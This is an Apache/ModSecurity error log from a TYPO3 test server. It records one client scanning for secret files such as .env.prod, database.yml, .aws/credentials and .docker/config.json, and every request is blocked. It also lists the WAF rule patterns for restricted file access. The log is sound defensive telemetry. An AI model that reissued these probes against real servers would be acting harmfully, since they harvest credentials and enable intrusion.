[Fri May 30 17:12:51.327348 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDnK86fe6YUdhe6un0PP1QAAAAE"], referer: http://surf.test.indacotrentino.com/.env.prod
[Fri May 30 17:12:51.327541 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDnK86fe6YUdhe6un0PP1QAAAAE"], referer: http://surf.test.indacotrentino.com/.env.prod
[Fri May 30 17:12:52.529261 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml, referer: http://surf.test.indacotrentino.com/config.yml
[Fri May 30 17:12:52.846147 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml, referer: http://surf.test.indacotrentino.com/config.yml
[Fri May 30 17:12:53.264518 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml, referer: http://surf.test.indacotrentino.com/config.yaml
[Fri May 30 17:12:53.581154 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml, referer: http://surf.test.indacotrentino.com/config.yaml
[Fri May 30 17:12:53.999215 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.yml, referer: http://surf.test.indacotrentino.com/database.yml
[Fri May 30 17:12:54.316093 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.yml, referer: http://surf.test.indacotrentino.com/database.yml
[Fri May 30 17:12:57.831259 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.yml, referer: http://surf.test.indacotrentino.com/db.yml
[Fri May 30 17:12:58.148141 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.yml, referer: http://surf.test.indacotrentino.com/db.yml
[Fri May 30 17:12:58.566177 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.yaml, referer: http://surf.test.indacotrentino.com/db.yaml
[Fri May 30 17:12:58.882962 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.yaml, referer: http://surf.test.indacotrentino.com/db.yaml
[Fri May 30 17:12:59.302203 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/db.config"] [unique_id "aDnK-6fe6YUdhe6un0PP6gAAAAE"], referer: http://surf.test.indacotrentino.com/db.config
[Fri May 30 17:12:59.302909 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/db.config"] [unique_id "aDnK-6fe6YUdhe6un0PP6gAAAAE"], referer: http://surf.test.indacotrentino.com/db.config
[Fri May 30 17:12:59.303192 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/db.config"] [unique_id "aDnK-6fe6YUdhe6un0PP6gAAAAE"], referer: http://surf.test.indacotrentino.com/db.config
[Fri May 30 17:12:59.619823 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/db.config"] [unique_id "aDnK-6fe6YUdhe6un0PP6wAAAAE"], referer: http://surf.test.indacotrentino.com/db.config
[Fri May 30 17:12:59.620237 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/db.config"] [unique_id "aDnK-6fe6YUdhe6un0PP6wAAAAE"], referer: http://surf.test.indacotrentino.com/db.config
[Fri May 30 17:12:59.620441 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/db.config"] [unique_id "aDnK-6fe6YUdhe6un0PP6wAAAAE"], referer: http://surf.test.indacotrentino.com/db.config
[Fri May 30 17:13:00.813046 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws.yml, referer: http://surf.test.indacotrentino.com/aws.yml
[Fri May 30 17:13:01.129767 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws.yml, referer: http://surf.test.indacotrentino.com/aws.yml
[Fri May 30 17:13:01.548615 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secret.yaml, referer: http://surf.test.indacotrentino.com/aws-secret.yaml
[Fri May 30 17:13:01.865358 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secret.yaml, referer: http://surf.test.indacotrentino.com/aws-secret.yaml
[Fri May 30 17:13:02.283922 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDnK_qfe6YUdhe6un0PP8gAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Fri May 30 17:13:02.284199 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDnK_qfe6YUdhe6un0PP8gAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Fri May 30 17:13:02.284415 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDnK_qfe6YUdhe6un0PP8gAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Fri May 30 17:13:02.601990 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDnK_qfe6YUdhe6un0PP8wAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Fri May 30 17:13:02.602418 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDnK_qfe6YUdhe6un0PP8wAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Fri May 30 17:13:02.602697 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDnK_qfe6YUdhe6un0PP8wAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Fri May 30 17:13:03.019979 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aDnK_6fe6YUdhe6un0PP9AAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/config
[Fri May 30 17:13:03.020245 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aDnK_6fe6YUdhe6un0PP9AAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/config
[Fri May 30 17:13:03.020458 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aDnK_6fe6YUdhe6un0PP9AAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/config
[Fri May 30 17:13:03.337263 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aDnK_6fe6YUdhe6un0PP9QAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/config
[Fri May 30 17:13:03.337534 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aDnK_6fe6YUdhe6un0PP9QAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/config
[Fri May 30 17:13:03.337757 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aDnK_6fe6YUdhe6un0PP9QAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/config
[Fri May 30 17:13:03.755469 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials.json"] [unique_id "aDnK_6fe6YUdhe6un0PP9gAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/credentials.json
[Fri May 30 17:13:03.755759 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials.json"] [unique_id "aDnK_6fe6YUdhe6un0PP9gAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/credentials.json
[Fri May 30 17:13:03.755955 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials.json"] [unique_id "aDnK_6fe6YUdhe6un0PP9gAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/credentials.json
[Fri May 30 17:13:04.073236 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials.json"] [unique_id "aDnLAKfe6YUdhe6un0PP9wAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/credentials.json
[Fri May 30 17:13:04.073528 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials.json"] [unique_id "aDnLAKfe6YUdhe6un0PP9wAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/credentials.json
[Fri May 30 17:13:04.073719 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials.json"] [unique_id "aDnLAKfe6YUdhe6un0PP9wAAAAE"], referer: http://surf.test.indacotrentino.com/.aws/credentials.json
[Fri May 30 17:13:04.491227 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.aws, referer: http://surf.test.indacotrentino.com/.aws/credentials.yml
[Fri May 30 17:13:04.807890 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.aws, referer: http://surf.test.indacotrentino.com/.aws/credentials.yml
[Fri May 30 17:13:05.226550 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.aws, referer: http://surf.test.indacotrentino.com/.aws/credentials.yaml
[Fri May 30 17:13:05.543177 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.aws, referer: http://surf.test.indacotrentino.com/.aws/credentials.yaml
[Fri May 30 17:13:07.506907 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml, referer: http://surf.test.indacotrentino.com/docker-compose.yml
[Fri May 30 17:13:07.823595 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml, referer: http://surf.test.indacotrentino.com/docker-compose.yml
[Fri May 30 17:13:08.242473 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yaml, referer: http://surf.test.indacotrentino.com/docker-compose.yaml
[Fri May 30 17:13:08.559700 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yaml, referer: http://surf.test.indacotrentino.com/docker-compose.yaml
[Fri May 30 17:13:08.976627 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.dev.yml, referer: http://surf.test.indacotrentino.com/docker-compose.dev.yml
[Fri May 30 17:13:09.293542 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.dev.yml, referer: http://surf.test.indacotrentino.com/docker-compose.dev.yml
[Fri May 30 17:13:09.711476 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.override.yml, referer: http://surf.test.indacotrentino.com/docker-compose.override.yml
[Fri May 30 17:13:10.028330 2025] [authz_core:error] [pid 3513600] [client 129.146.124.161:58208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.override.yml, referer: http://surf.test.indacotrentino.com/docker-compose.override.yml
[Fri May 30 17:13:10.448043 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aDnLBqfe6YUdhe6un0PQCAAAAAE"], referer: http://surf.test.indacotrentino.com/.docker/config.json
[Fri May 30 17:13:10.448307 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aDnLBqfe6YUdhe6un0PQCAAAAAE"], referer: http://surf.test.indacotrentino.com/.docker/config.json
[Fri May 30 17:13:10.448502 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aDnLBqfe6YUdhe6un0PQCAAAAAE"], referer: http://surf.test.indacotrentino.com/.docker/config.json
